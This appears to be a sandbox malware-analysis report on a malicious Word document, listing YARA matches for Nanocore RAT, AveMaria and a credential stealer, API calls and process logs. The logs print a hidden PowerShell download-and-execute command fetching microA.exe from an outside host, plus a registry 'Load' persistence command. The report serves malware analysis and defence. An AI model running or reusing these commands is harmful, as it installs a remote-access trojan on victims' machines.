Source: 00000019.00000002.2365335764.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000019.00000002.2365335764.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000010.00000002.2173889702.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000010.00000002.2173889702.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000024.00000002.2366678139.0000000000740000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000024.00000002.2366678139.0000000000740000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000003.00000002.2099841469.0000000000390000.00000004.00000020.sdmp, type: MEMORY	Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 00000024.00000002.2366711358.0000000000760000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000024.00000002.2366711358.0000000000760000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000024.00000002.2367125830.0000000000C30000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000024.00000002.2367125830.0000000000C30000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000012.00000002.2169991730.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000012.00000002.2169991730.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000024.00000002.2373841874.00000000034F9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000024.00000002.2366178722.0000000000580000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000024.00000002.2366178722.0000000000580000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000024.00000002.2365752847.00000000003C0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000024.00000002.2365752847.00000000003C0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000024.00000002.2368726413.0000000002502000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000024.00000002.2374416119.0000000003777000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore

Source: microA[1].exe.0.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: microA.exe.3.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: microA.exe.10.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: microA.exe.11.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: microA.exe.12.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: images.exe.16.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.phis.troj.spyw.expl.evad.winDOC@44/32@14/2

Source: C:\Users\user\AppData\Local\Temp\microA.exe	Code function: 16_2_00410B38 OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Code function: 17_2_00410B38 OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Code function: 18_2_00410B38 OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,
Source: C:\Users\user\AppData\Local\Temp\images.exe	Code function: 25_2_00410B38 OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,

Source: C:\Users\user\AppData\Local\Temp\microA.exe

Code function: 16_2_0041405F RegSetValueExA,CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

Source: C:\Users\user\AppData\Local\Temp\microA.exe

Code function: 16_2_004148B6 CoInitialize,CoCreateInstance,VariantInit,CoUninitialize,

Source: C:\Users\user\AppData\Local\Temp\microA.exe

Code function: 16_2_00415169 LoadResource,SizeofResource,LockResource,GetTempPathA,GetTempPathA,lstrcatA,lstrcatA,GetTempPathA,lstrcatA,CreateFileA,WriteFile,CloseHandle,wsprintfA,ShellExecuteExA,

Source: C:\Users\user\AppData\Local\Temp\microA.exe

Code function: 16_2_0040D33C OpenSCManagerW,OpenServiceW,CloseServiceHandle,ChangeServiceConfigW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

Source: C:\Users\user\AppData\Local\Temp\microA.exe

File created: C:\Program Files\Microsoft DN1

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$0-MR 311.doc

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRCBE6.tmp

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................p.......#.........&.......+.....p.........+.......&.....`I(........v.....................K/.....................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....#..................j....`...............................}..v............0................!..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v..../.......u.r.i.n.g. .a. .W.e.b.C.l.i.e.n.t. .r.e.q.u.e.s.t..."...........0................ ......6.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v..../..................j....................................}..v....P.......0................!..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....;.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.7...............}..v....`.......0................ ......".......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....;..................j....................................}..v............0................!..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....G..................j....@$..............................}..v....`.......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....G..................j....................................}..v............0................!..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....S..................j....@$..............................}..v....`.......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....S..................j....................................}..v............0................!..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v...._.......\.U.s.e.r.s.\.A.l.b.u.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.m.i.c.r.o.A...e.x.e.'.. ......P.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................0......._........................7...... .......................}..v............ ................!..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....k..................j....@$..............................}..v............0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....k..................j....P...............................}..v............0................!..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................E.......w..................j....@$..............................}..v............0.......................f.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....w..................j....................................}..v....@.......0................!..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v............ ..........j....@$..............................}..v............0................ ..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....................................}..v............0................!..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..".............p.......#.........&.......+.....p.........+.......&.....`I(........v.....................K/.......".............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....#...............o..j....................................}..v............0................"z.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v..../.......u.r.i.n.g. .a. .W.e.b.C.l.i.e.n.t. .r.e.q.u.e.s.t..."...........0...............8"z.....6.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v..../...............o..j....x...............................}..v............0................"z.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....;.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.7...............}..v............0...............8"z.....".......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....;...............o..j....................................}..v....@.......0................"z.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..".............y=.v....G..................j.....%z.............................}..v............0.................".............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....G...............o..j....................................}..v....@.......0................"z.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..".............y=.v....S..................j.....%z.............................}..v............0.................".............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....S...............o..j....................................}..v....@.......0................"z.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v...._.......\.U.s.e.r.s.\.A.l.b.u.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.m.i.c.r.o.A...e.x.e.'.8"z.....P.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v...._...............o..j....................................}..v............0................"z.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..".............y=.v....k..................j.....%z.............................}..v....@.......0.................".............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....k...............o..j....................................}..v....x.......0................"z.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..".............E.......w..................j.....%z.............................}..v............0.................".....f.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....w...............o..j....h...............................}..v............0................"z.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v............ ..........j.....%z.............................}..v....x.......0...............8"z.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................o..j....0...............................}..v............0................"z.............................
Source: C:\Windows\SysWOW64\reg.exe	Console Write: ....................,.'.........T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y.................N.......................
Source: C:\Windows\SysWOW64\cmd.exe	Console Write: ................................M.i.c.r.o.s.o.f.t. .W.i.n.d.o.w.s. .[.V.e.r.s.i.o.n. .6...1...7.6.0.1.].........X.......H.................E.....
Source: C:\Windows\SysWOW64\cmd.exe	Console Write: ....................................c.r.(.P.....................l...............................6.0.1.].........X.........................E.....
Source: C:\Windows\SysWOW64\cmd.exe	Console Write: ....................................c.r.(.P.....................l...............................6.0.1.].................~.................E.....
Source: C:\Windows\SysWOW64\cmd.exe	Console Write: ....................................c.r.(.P.....................l...............................6.0.1.].........X.........................E.....
Source: C:\Windows\SysWOW64\cmd.exe	Console Write: ..................U.....................(.P.....................l...............................6.0.1.].........X.........................E.....
Source: C:\Windows\SysWOW64\cmd.exe	Console Write: ..................U.............C.:.\.W.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.>.........................6.0.1.].........X.......(.................E.....

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Users\user\AppData\Roaming\microA.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\microA.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\microA.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\ProgramData\images.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\AppData\Roaming\microA.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\images.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\images.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\images.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: N40-MR 311.doc

Virustotal: Detection: 43%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/microA.exe','C:\Users\user\AppData\Roaming\microA.exe');Start-Process 'C:\Users\user\AppData\Roaming\microA.exe''
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE 'C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE' C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\PNG32.FLT
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/microA.exe','C:\Users\user\AppData\Roaming\microA.exe');Start-Process 'C:\Users\user\AppData\Roaming\microA.exe''
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/microA.exe','C:\Users\user\AppData\Roaming\microA.exe');Start-Process 'C:\Users\user\AppData\Roaming\microA.exe''
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\microA.exe 'C:\Users\user\AppData\Roaming\microA.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\microA.exe 'C:\Users\user\AppData\Roaming\microA.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\microA.exe 'C:\Users\user\AppData\Roaming\microA.exe'
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\verclsid.exe 'C:\Windows\system32\verclsid.exe' /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\notepad.exe 'C:\Windows\system32\NOTEPAD.EXE' 'C:\Users\user\AppData\Local\Temp\abdtfhghgdghgh .ScT'
Source: C:\Users\user\AppData\Roaming\microA.exe	Process created: C:\Users\user\AppData\Local\Temp\microA.exe C:\Users\user\AppData\Local\Temp\microA.exe
Source: C:\Users\user\AppData\Roaming\microA.exe	Process created: C:\Users\user\AppData\Local\Temp\microA.exe C:\Users\user\AppData\Local\Temp\microA.exe
Source: C:\Users\user\AppData\Roaming\microA.exe	Process created: C:\Users\user\AppData\Local\Temp\microA.exe C:\Users\user\AppData\Local\Temp\microA.exe
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c REG ADD 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows' /f /v Load /t REG_SZ /d 'C:\ProgramData\images.exe'
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Process created: C:\ProgramData\images.exe C:\ProgramData\images.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows' /f /v Load /t REG_SZ /d 'C:\ProgramData\images.exe'
Source: C:\ProgramData\images.exe	Process created: C:\Users\user\AppData\Local\Temp\images.exe C:\Users\user\AppData\Local\Temp\images.exe
Source: C:\ProgramData\images.exe	Process created: C:\Users\user\AppData\Local\Temp\images.exe C:\Users\user\AppData\Local\Temp\images.exe
Source: C:\ProgramData\images.exe	Process created: C:\Users\user\AppData\Local\Temp\images.exe C:\Users\user\AppData\Local\Temp\images.exe
Source: C:\Users\user\AppData\Local\Temp\images.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe
Source: C:\Users\user\AppData\Local\Temp\images.exe	Process created: C:\Users\user\AppData\Roaming\JhwfHBtD..exe 'C:\Users\user\AppData\Roaming\JhwfHBtD..exe'
Source: unknown	Process created: C:\Windows\System32\drvinst.exe DrvInst.exe '1' '200' 'UMB\UMB\1&841921d&0&TERMINPUT_BUS' '' '' '6e3bed883' '0000000000000000' '00000000000005F4' '00000000000005E4'
Source: C:\Users\user\AppData\Roaming\JhwfHBtD..exe	Process created: C:\Users\user\AppData\Roaming\JhwfHBtD..exe C:\Users\user\AppData\Roaming\JhwfHBtD..exe
Source: unknown	Process created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe'
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/microA.exe','C:\Users\user\AppData\Roaming\microA.exe');Start-Process 'C:\Users\user\AppData\Roaming\microA.exe''
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE 'C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE' C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\PNG32.FLT
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/microA.exe','C:\Users\user\AppData\Roaming\microA.exe');Start-Process 'C:\Users\user\AppData\Roaming\microA.exe''
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/microA.exe','C:\Users\user\AppData\Roaming\microA.exe');Start-Process 'C:\Users\user\AppData\Roaming\microA.exe''
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\verclsid.exe 'C:\Windows\system32\verclsid.exe' /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\notepad.exe 'C:\Windows\system32\NOTEPAD.EXE' 'C:\Users\user\AppData\Local\Temp\abdtfhghgdghgh .ScT'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\microA.exe 'C:\Users\user\AppData\Roaming\microA.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\microA.exe 'C:\Users\user\AppData\Roaming\microA.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\microA.exe 'C:\Users\user\AppData\Roaming\microA.exe'
Source: C:\Users\user\AppData\Roaming\microA.exe	Process created: C:\Users\user\AppData\Local\Temp\microA.exe C:\Users\user\AppData\Local\Temp\microA.exe
Source: C:\Users\user\AppData\Roaming\microA.exe	Process created: C:\Users\user\AppData\Local\Temp\microA.exe C:\Users\user\AppData\Local\Temp\microA.exe
Source: C:\Users\user\AppData\Roaming\microA.exe	Process created: C:\Users\user\AppData\Local\Temp\microA.exe C:\Users\user\AppData\Local\Temp\microA.exe
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c REG ADD 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows' /f /v Load /t REG_SZ /d 'C:\ProgramData\images.exe'
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Process created: C:\ProgramData\images.exe C:\ProgramData\images.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows' /f /v Load /t REG_SZ /d 'C:\ProgramData\images.exe'
Source: C:\ProgramData\images.exe	Process created: C:\Users\user\AppData\Local\Temp\images.exe C:\Users\user\AppData\Local\Temp\images.exe
Source: C:\ProgramData\images.exe	Process created: C:\Users\user\AppData\Local\Temp\images.exe C:\Users\user\AppData\Local\Temp\images.exe
Source: C:\ProgramData\images.exe	Process created: C:\Users\user\AppData\Local\Temp\images.exe C:\Users\user\AppData\Local\Temp\images.exe
